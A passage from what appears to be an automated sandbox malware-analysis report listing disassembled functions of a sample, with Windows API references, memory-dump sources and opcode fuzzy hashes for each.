                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 190572456-0
                                                                                                                        • Opcode ID: 4b02a6565f057b04843cad23f1af0eb65ba63ac509fd4c66602aa627f3aea285
                                                                                                                        • Instruction ID: 7727447acc7310ae10e4e4ab9b16818d4f5ddc84aa42f7c7c3d3431b4845d3f6
                                                                                                                        • Opcode Fuzzy Hash: 4b02a6565f057b04843cad23f1af0eb65ba63ac509fd4c66602aa627f3aea285
                                                                                                                        • Instruction Fuzzy Hash: 61110633A002256F9F229E29EC409DBB796AB8472871E5231FD55FB254D731EC068BD2
                                                                                                                        Function 00E9CE40 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E9CE45
                                                                                                                          • Part of subcall function 00E95E37: __EH_prolog.LIBCMT ref: 00E95E3C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: de5752f1c447f98e33fa0cd9fc4947110e9925af26c8a81be8513a9a33315e3a
                                                                                                                        • Instruction ID: fd3dd3ae3aa5307705f0c25f910cb7ff7996c876c892fe93db7d3abd47ccd4ac
                                                                                                                        • Opcode Fuzzy Hash: de5752f1c447f98e33fa0cd9fc4947110e9925af26c8a81be8513a9a33315e3a
                                                                                                                        • Instruction Fuzzy Hash: 78119E71A002449AEF24EB798509BAEBBE89F85304F24146EA446B7682DB745A00CB62
                                                                                                                        Function 00E99215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: b9ca255bdd886fa79691b2b37a76ce03d7b34b81b433dbe4cc065d6d9ec14159
                                                                                                                        • Instruction ID: 39cb7af40c7ec8d048b544a2ee85bb21ccccec3c8712eabc538cef933d704cc1
                                                                                                                        • Opcode Fuzzy Hash: b9ca255bdd886fa79691b2b37a76ce03d7b34b81b433dbe4cc065d6d9ec14159
                                                                                                                        • Instruction Fuzzy Hash: 3301C833900539ABCF11ABACCD819DEB771BF88740F015129F812B7262DA34CD04C6A0
                                                                                                                        Function 00EBC479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EBB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00EB9813,00000001,00000364,?,00EB3F73,00000050,?,00ED1030,00000200), ref: 00EBB177
                                                                                                                        • _free.LIBCMT ref: 00EBC4E5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 614378929-0
                                                                                                                        • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                        • Instruction ID: b4f030b468f34350b7c30fb33140220976f8f8fc2ef4a27cc29f609582a8add4
                                                                                                                        • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                        • Instruction Fuzzy Hash: A80126722043066BE3318E6998819ABFBECEB85330F25192DE194A3281EA30A905C764
                                                                                                                        Function 00EBB136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00EB9813,00000001,00000364,?,00EB3F73,00000050,?,00ED1030,00000200), ref: 00EBB177
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: a505218c4e69df0212105d930d31925c4328e71e85046b25d4ab5f2a6854107c
                                                                                                                        • Instruction ID: 1e8507589fa880a3129b3154f85e1d52a76f60207c75b8911a31c90846f1fd97
                                                                                                                        • Opcode Fuzzy Hash: a505218c4e69df0212105d930d31925c4328e71e85046b25d4ab5f2a6854107c
                                                                                                                        • Instruction Fuzzy Hash: 08F0B4325071256BDB215A6AAC15BDF7788AB81770F19A161B808BA191CBA0D90186E0
                                                                                                                        Function 00EB3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00EB3C3F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 190572456-0
                                                                                                                        • Opcode ID: 410ddad365a3431a62c44667db4424ef344dbc74ea550cc6ab40cac0d3a4d045
                                                                                                                        • Instruction ID: 00fd74eecca11ec4eab4c356a1717219b3ff979e43a413cffe969fe3f3c46b3b
                                                                                                                        • Opcode Fuzzy Hash: 410ddad365a3431a62c44667db4424ef344dbc74ea550cc6ab40cac0d3a4d045
                                                                                                                        • Instruction Fuzzy Hash: 55F0A0322002169F8F118EF9EC029DBBBA9EF41B247105224FA05F71A0DB31DA20CBA0
                                                                                                                        Function 00EB8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00EBCA2C,00000000,?,00EB6CBE,?,00000008,?,00EB91E0,?,?,?), ref: 00EB8E38
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: 4a54d669b6f796c21deee9f276821959e7ee147e12b1c51f7061680725314370
                                                                                                                        • Instruction ID: 610032d2b1fee17fe28e4bd893aafc02a825d22693945bc246affa636593c8f7
                                                                                                                        • Opcode Fuzzy Hash: 4a54d669b6f796c21deee9f276821959e7ee147e12b1c51f7061680725314370
                                                                                                                        • Instruction Fuzzy Hash: 39E065312061155BDB752A669E15BDF768C9B817B8F153121BC59BA2A1CF21CC01C1F1
                                                                                                                        Function 00E95ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E95AC2
                                                                                                                          • Part of subcall function 00E9B505: __EH_prolog.LIBCMT ref: 00E9B50A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: fe5d4a7096ca0deefe415475c6cc1e933ca45ce22263372a6c783b12c50d7266
                                                                                                                        • Instruction ID: c295366373b4087ebae225ce5c5846828a741f4da2d1ab11392489093fec9ce2
                                                                                                                        • Opcode Fuzzy Hash: fe5d4a7096ca0deefe415475c6cc1e933ca45ce22263372a6c783b12c50d7266
                                                                                                                        • Instruction Fuzzy Hash: 16018130811690DED725E7B8C1857DDF7E49F99308F50948DA45677682CBB42B08D7A3
                                                                                                                        Function 00E9A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E9A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00E9A592,000000FF,?,?), ref: 00E9A6C4
                                                                                                                          • Part of subcall function 00E9A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00E9A592,000000FF,?,?), ref: 00E9A6F2
                                                                                                                          • Part of subcall function 00E9A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00E9A592,000000FF,?,?), ref: 00E9A6FE
                                                                                                                        • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00E9A598
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1464966427-0
                                                                                                                        • Opcode ID: f19e4a3c472c3cdefdfa33f3c0713e428939a4cacc913e2ebd93a201724f55cd
                                                                                                                        • Instruction ID: a52a136e7128e049fcd921bcdef9d431b9a185284287f3a8687fe69942f8e764
                                                                                                                        • Opcode Fuzzy Hash: f19e4a3c472c3cdefdfa33f3c0713e428939a4cacc913e2ebd93a201724f55cd
                                                                                                                        • Instruction Fuzzy Hash: 3BF0E931008390AACF2257B44904BCB7BE05F15331F08DA1DF0FD320D6C27110949B63
                                                                                                                        Function 00EA0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetThreadExecutionState.KERNEL32(00000001), ref: 00EA0E3D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExecutionStateThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2211380416-0
                                                                                                                        • Opcode ID: e88c9e82d43f673cf2b87c8771449848e5ad1507a6162be661e83f2597619901
                                                                                                                        • Instruction ID: d5bb072234bbcdf3db701a6fea588c59f7bd8c996103d809920af2649d0514c5
                                                                                                                        • Opcode Fuzzy Hash: e88c9e82d43f673cf2b87c8771449848e5ad1507a6162be661e83f2597619901
                                                                                                                        • Instruction Fuzzy Hash: 6DD0C2116010546ADE1173292816BFE26868FCF320F0C20A7B4467F293CA440886A272
                                                                                                                        Function 00EAA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GdipAlloc.GDIPLUS(00000010), ref: 00EAA62C
                                                                                                                          • Part of subcall function 00EAA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00EAA3DA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1915507550-0
                                                                                                                        • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                        • Instruction ID: 4b262db375aa98960673bb7b9e139c8852e52bb8b0b3f1c2bffacd4f855e412f
                                                                                                                        • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                        • Instruction Fuzzy Hash: 3ED0A73020030877DF016B218D029BE75D5EB46340F089035B842ED141EBB2F910D662
                                                                                                                        Function 00EAE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DloadProtectSection.DELAYIMP ref: 00EAE5E3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DloadProtectSection
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2203082970-0
                                                                                                                        • Opcode ID: cbc092cab30bcfb3d600e00ed8db10503b23a755e47f6f2b9c6b91682ec3cd6d
                                                                                                                        • Instruction ID: 09539d56ff6235ca44601df18153e0e126039af5fca5228df9b1ec9e3bb21ea6
                                                                                                                        • Opcode Fuzzy Hash: cbc092cab30bcfb3d600e00ed8db10503b23a755e47f6f2b9c6b91682ec3cd6d
                                                                                                                        • Instruction Fuzzy Hash: C6D0A9B0684244CEC20DEBAAA842B243290B36EB08F8020C1F245B9290DA646084CB01
                                                                                                                        Function 00EADD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00EA1B3E), ref: 00EADD92
                                                                                                                          • Part of subcall function 00EAB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00EAB579
                                                                                                                          • Part of subcall function 00EAB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EAB58A
                                                                                                                          • Part of subcall function 00EAB568: IsDialogMessageW.USER32(0001043A,?), ref: 00EAB59E
                                                                                                                          • Part of subcall function 00EAB568: TranslateMessage.USER32(?), ref: 00EAB5AC
                                                                                                                          • Part of subcall function 00EAB568: DispatchMessageW.USER32(?), ref: 00EAB5B6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 897784432-0
                                                                                                                        • Opcode ID: 990174b69c5afc9692487f9c7191ac172d6b59f84608b339b30a97474ce85231
                                                                                                                        • Instruction ID: 4ffc045134658faad619db4f04bc8fdae7184cbd53ec201dddb43755de724d03
                                                                                                                        • Opcode Fuzzy Hash: 990174b69c5afc9692487f9c7191ac172d6b59f84608b339b30a97474ce85231
                                                                                                                        • Instruction Fuzzy Hash: 23D09E31144300BED6012B52DE06F1A7AE6EB8DB04F404595B284740B28672AD21DB11
                                                                                                                        Function 00E998BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileType.KERNELBASE(000000FF,00E997BE), ref: 00E998C8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileType
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3081899298-0
                                                                                                                        • Opcode ID: 0e6d6b20f3bea13e874746a05ffda22e3aeb8ed4eade3e6a36c3174f7b9590f6
                                                                                                                        • Instruction ID: a1934fce740d3f8c0fec1633483b59a3db698dd7dc99bf3bbac1d92b88c33831
                                                                                                                        • Opcode Fuzzy Hash: 0e6d6b20f3bea13e874746a05ffda22e3aeb8ed4eade3e6a36c3174f7b9590f6
                                                                                                                        • Instruction Fuzzy Hash: 8FC01234400205858F34563898450957311AB533697B4A69CC028950A2D323CC47EB00
                                                                                                                        Function 00EAE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE3FC
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: ae73b2e30f5ccfa11693e6ed44abe8a809e7e2e578f93fb59f0307e3db2ad5cd
                                                                                                                        • Instruction ID: e56721bbdfac1de0ef025280befd56ac8aebda2db5099644249180bc3ba64b61
